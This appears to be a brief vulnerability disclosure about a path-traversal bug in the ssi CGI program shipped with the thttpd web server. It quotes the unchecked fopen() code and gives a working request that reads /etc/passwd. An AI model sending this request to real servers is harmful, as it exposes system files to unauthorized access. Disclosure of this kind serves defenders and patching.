ssi ( server sides include ) is a cgi proggie that comes by default with thttpd web server, I am not sure about others. ssi has a nasty bug with regards to the PATH_TRANSLATED env var. As you can see the contents of PATH_TRANSLATED get copied into path_translated which get's fopen()'ed later. It does no checking on the path_translated string. After it opens the file it runs the read_file() function which returns the contents of fp. So as you can plainly see we can view any file on the system. try GET /cgi-bin/ssi//../../../../../../../../../etc/passwd this would yield the passwd file. path_translated = getenv( "PATH_TRANSLATED" ); if ( path_translated == (char*) 0 ) { internal_error( "Couldn't get PATH_TRANSLATED environment variable." ); exit( 1 ); } /* Open it. */ fp = fopen( path_translated, "r" ); read_file( path_info, path_translated, fp );